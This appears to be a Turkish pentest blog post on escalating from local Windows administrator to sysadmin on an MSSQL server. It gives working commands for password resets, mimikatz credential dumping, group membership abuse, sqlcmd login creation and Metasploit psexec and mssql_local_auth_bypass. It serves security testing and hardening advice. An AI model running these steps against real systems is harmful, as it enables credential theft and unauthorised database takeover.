MS SQL Yüklü İşletim Sisteminde Veritabanına Erişimin Elde Edilmesi

Sızma testlerinde MSSQL yüklü bilgisayarda yerel yönetici hakkına sahip olduktan sonra, veritabanına direk olarak erişime sahip olunmayabilmektedir. Bu yazıda, MSSQL sunucu bilgisayarda yerel yönetici iken, uygulamaya giriş yapabilmek için gerçekleştirilebilecek farklı yöntemler incelenecektir. Belirtilecek işlemler 5 ana başlıkta incelenebilir:

1) İşletim sistemindeki yerel kullanıcıların parolaları değiştirilerek
2) Servisi çalıştıran hesabın parolası elde edilerek
3) İşletim sistemindeki belli bir yerel gruba üye olunarak
4) Windows sqlcmd aracıyla yeni bir hesap oluşturarak
5) MSF mssql_local_auth_bypass post exploit modülü ile

Yukarıda belirtilen işlemler, aşağıdaki 3 durum mevcut iken gerçekleştirilmiştir:

  • SQL sunucunun Mixed moddadır:

 

  • Saldırgan, işletim sistemine Hacked adlı yerel bir yönetici ile erişim sağlamıştır:

 

  • Hacked hesabı ile MSSQL uygulamasına erişim sağlanamamaktadır:

MSSQL sunucu bilgisayarda yerel yönetici iken, uygulamaya giriş yapabilmek için gerçekleştirilebilecek 5 yöntem aşağıdaki gibidir:

1) Kullanıcı Hesapları ile

Yerel yönetici yetkisi ile erişim sağladıktan sonra tüm kullanıcıların parolası değiştirilebilir.

net user
net user Birkan Bb123456

Benzer olarak MSSQL sunucusu etki alanına dahil ise ve Domain Admin yetkilerine sahip olunduysa; iş tanımında, adında, departmanında,… veritabanı ile ilgili bilgi geçen hesapların parolaları da değiştirilerek, bu sunucuda oturum açılabilir ve veritabanına erişim sağlanıp sağlanmadığı kontrol edilebilir.

Sızma testleri sırasında bu şekilde bir değişiklik yapılması uygun değildir. Parolası değiştirilen kullanıcı hesapların parolaları bazı uygulamalarda, betiklerde, servislerde … kullanılıyor olabilir, sonuç olarak da parola değişikliği sürekliliği ve erişebilirliği bozabilir.

2) MSSQLSERVER Servisi Hesabı ile

MS SQL Server 2012 öncesinde sunucu varsayılan olarak SYSTEM haklarıyla çalışır. Ancak MSSQLSERVER servisi kullanıcı hakları ile de çalışabilir.

Bu durumda, servis hesabının parolası elde edilebilir. Parolanın elde edilmesi için Mimikatzi WCE gibi araçlar kullanılabilir. Ayrıntılı bilgi için bakınız.

mimikatz
privilege::debug
sekurlsa::wdigest

Yukarıda 2 adet kimlik bilgisi (Hacked/Hh123456 ve SqlAjani/Ss123456) elde edilmiştir. Hacked hesabı, saldırganın sahibi olduğu hesap, SqlAjani hesabı ise MSSQLSERVER servisinin çalıştığı kullanıcı hesabıdır. Eğer MSSQLSERVER servisi, Domain Admins grubu üyelerinden biri ise veya etki alanında yüksek yetkili (etki alanına kullanıcı ekleme, etki alanındaki kullanıcının grubuna değiştirebilme,… gibi yetkiler) ise, MSSQL sunucusunu ele geçiren saldırgan, tüm etki alanına dahil olan sistemlerde yetki sahibi olabilir. Bu sebeple, MSSQLSERVER (ve diğer) servislerin sadece gerekli yetkilere sahip hesaplar ile çalıştırılması tavsiye edilmektedir.

Not: Kritik sistemlerde Mimikatz / WCE gibi araçların direk olarak çalıştırılmaması, LSASS.exe prosesinin dump dosyasının sanal bir makinede çalıştırılması tavsiye edilmektedir. Ayrıntılı bilgi için bakınız.

3) Gruplar ile

Yerel yönetici yetkisi ile erişim sağladıktan sonra, mevcut hesap veritabanı ile ilişkili yerel gruplara eklenebilir.

net localgroup
net localgroup “SQL Yoneticileri” Hacked /add

Mevcut hesap, yerel gruplara eklendikten ve oturum yeniden açıldıktan sonra, MSSQL sunucuya giriş sağlanabilir.

Benzer olarak MSSQL sunucusu etki alanına dahil ise ve Domain Admin yetkilerine sahip olunduysa; tanımında, adında… veritabanı ile ilgili bilgi geçen gruba da üye olunduktan sonra, bu sunucuda oturum açılabilir ve veritabanına erişim sağlanıp sağlanmadığı kontrol edilebilir.

4) Sqlcmd Aracı ile

Yerel yönetici yetkisi ile erişim sağladıktan sonra, MS Psexec aracıyla SYSTEM yetkisine sahip olanabilir.

psexec /s cmd

SYSTEM haklarına geçildikten sonra da sqlcmd aracı kullanılarak Sysadmin rolüne sahip bir hesap oluşturulabilir.

sqlcmd -S localhost

USE [master]
GO
CREATE LOGIN [sa_hacked] WITH PASSWORD=N’Hh123456′
GO
EXEC master..sp_addsrvrolemember @loginame = N’sa_hacked’, @rolename = N’sysadmin’
GO

Böylece, sa_hacked adlı sysadmin rolüne sahip hesap ile oturum açılabilir.

 

5) MSF mssql_local_auth_bypass ile

Yerel yönetici bilgileri ile MSF psexec gibi bir modül ile Meterpreter kabuğu elde edildikten sonra, MSFmssql_local_auth_bypass post exploitation modülü ile veritabanında tam yetkiye sahip olunabilir.

MSF psexec modülü ile meterpreter aşağıdaki gibi elde edilebilir:

use exploit/windows/smb/psexec
set RHOST 172.22.71.247
set SMBUSER Hacked
set SMBPASS Hh123456
exploit
getuid

Not: Meterpreter kabuğundan Windows cmd kabuğuna geçiş yaptıktan sonra – aşağıda incelenecek olan MSF modülünü kullanmadan – bir önceki başlıkta bahsedilen sqlcmd aracını kullanarak da sysadmin rolü elde edilebilir.

MSF mssql_local_auth_bypass post exploitation modülü aşağıdaki gibidir:

background
search mssql_local_auth_bypass
use post/windows/manage/mssql_local_auth_bypass
show options

Post modül aşağıdaki gibi ayarlanabilir ve çalıştırılabilir:

set DB_USERNAME yeni_sa
set DB_PASSWORD yeni_sa_Mssql123
set SESSION 1
run

Böylece, yeni_sa adlı sysadmin rolüne sahip hesap ile oturum açılabilir.

Veritabanında işlemler gerçekleştirildikten sonra oluşturulan hesabın (yeni_sa) silinmesi gerekmektedir. Silme işlemi Microsoft SQL Server Management Studio konsolundan gerçekleştirilebileceği gibi, MSF mssql_local_auth_bypass post exploitation modülündeki REMOVE_LOGIN seçeneğini “true” olarak değiştirilmesiyle aşağıdaki gibi de gerçekleştirilebilir:

use post/windows/manage/mssql_local_auth_bypass
set DB_USERNAME yeni_sa
set DB_PASSWORD RastgeleParola
set SESSION 1
set REMOVE_LOGIN true
run

Via  Ertugrul Basaranoglu
Reklamlar

Hakkında Uğur PEK
İşletme ve Teknoloji alanında Yüksek Lisansımı Çukurova Üniversitesinde tamamladım. Microsoft,Oracle,Vmvare,Dell,HP,IBM,NetApp gibi sektörün önde gelen birçok firmasının Workshoplarına, Eventlerına katıldım. Ordu Yardımlaşma Kurumunda IT uzmanı olarak görev yaptım. Şuan Enerji sektörünün önde gelen bir firmasında IT Departmanında İş hayatına devam etmekteyim. İlgi alanlarım Veri Depolama, Backup çözümleri, Vmware Virtualization ve Storage ailesi

Bir Cevap Yazın

Aşağıya bilgilerinizi girin veya oturum açmak için bir simgeye tıklayın:

WordPress.com Logosu

WordPress.com hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Twitter resmi

Twitter hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Facebook fotoğrafı

Facebook hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Google+ fotoğrafı

Google+ hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap / Değiştir )

Connecting to %s

%d blogcu bunu beğendi: